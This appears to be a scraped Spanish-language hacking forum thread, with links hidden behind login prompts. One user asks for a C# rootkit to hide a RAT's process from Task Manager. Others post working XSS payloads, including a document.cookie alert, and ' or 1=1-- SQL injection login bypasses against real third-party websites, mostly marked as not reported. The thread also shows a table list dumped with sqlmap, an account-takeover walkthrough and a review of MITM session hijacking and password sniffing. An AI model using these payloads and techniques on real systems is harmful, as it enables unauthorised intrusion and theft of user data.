You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Buen día amigos, en esta oportunidad vengo en busca de un RootKit para esconder el proceso del RAT en el Administrador de Tareas, he buscado y solo lo encontre en VB6, pero lo necesito en C# o en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Este no es un grupo de desarrollo?

Por Favor Usa el Buscador, hay varios en el foro.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Xss Reflected

Web = You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector = "><script>alert(/MrOverHoax/)</script>
Autor = OverHoax

IFXss

Web = You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector = <script>alert(document.cookie)</script>
Autor = OverHoax

Salu2

OverHoax

Creo que llegaste tarde bro, el autor de este xss soy yo, por eso lo publique no?

Se que eres tu, pero pudiste publicarlas todas no solo 1... pero no vi que pusieras el de la IFXss

No se reportan todos los vectores, se reporta el fallo, XSS, IFxss es una variacion que depende del script inyectado pero sigue haciendo uso de un XSS

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Xss Reflected

Web = You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector = "><script>alert(/MrOverHoax/)</script>
Autor = OverHoax

IFXss

Web = You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector = <script>alert(document.cookie)</script>
Autor = OverHoax

Salu2

OverHoax

Creo que llegaste tarde bro, el autor de este xss soy yo, por eso lo publique no?

Tiene toda la razon del mundo!

Xss Reflected:
Web: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector: <script>alert("HD_Breaker")</script>
Reportado: No

PD: un fallo algo raro, que esta dado ya que se muestra escrito en web la sentencia el Usuario "XSS" No existe, de esta forma se puede explotar este tipo de XSS

SQLI
Web: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector: Usuario:  ' or 1=1-- /// Password: ' or 1=1--
Reportado: No

Buen tuto Bro! Te Felicito!

Woow genial lo tengo q probar!

+----------------------+
| agenda               |
| autores              |
| canales              |
| categoriasagenda     |
| chicadia             |
| cine                 |
| clasificados         |
| edimpresa            |
| educacionales        |
| encuesta             |
| masinfo              |
| noticias             |
| opciones             |
| operadores           |
| posiciones           |
| posiciones_secciones |
| salascine            |
| secciones            |
| serviciosxmail       |
| signos               |
| sub_secciones        |
| suscripcion          |
| tele                 |
| test                 |
| titulosmail          |
| zodiaco              |
| zonas                |
+----------------------+

SQLI

Web: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector: Le Pase sqlmap porq es BlindSql y no tenia ganas de probar You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Reportado: No

XSS

Web: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login"><img src=. onerror=alert("HD_Breaker")><!--
Reportado: No

XSS

Web: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login><script>alert(/HD_Breaker/)</script>
Reportado: No

XSS

Web: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Reportado: No

MITM:
Session Hijacker atrapa la sesion pero no te permite navegarla en su mayoria, la unica session que pude navegar fue la de Underc0de (con gmal hotmail no funciono pero con facebook si funciono)
Password Sniffer: Atrapa Texto Plano y no Siempre aveces Falla y captura solo el User
Redirect: Todo Correcto
Replace Images: No Funciono
Script Injection: Si Funciona
Custom Filter: Tambien me Funciono
KillConections: No lo probe
Replace Videos: No lo Probe
Simple Sniff: Funciona Correctamente

La web Oficial pide Minimamente GingerBread voy a testearlo en android, 2.3.x y te cuento que tal va!

XSS

Web: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Reportado: No

Recuerdo que alguien ya habia reportado un xss en CuantoCabron, pero creo q no es el mismo y q el otro estaba reparado, este es con double encode y caracteres limitados.

Pido Disculpas si Otra persona lo descubrio previamente

Como ven Dice Iniciar Sesion

Luego Del Vector:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login



Le Damos en Continuar



Vemos como ya estamos dentro como un usuario Fantasma

Le Damos a Editar:



y Podemos Cambiar los Datos de Nuestro User:



Reportado: No

XSS

Web: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login<%2Fi><img+src%3D.+onerror%3Dalert(/HD_Breaker/)><!--
Reportado: No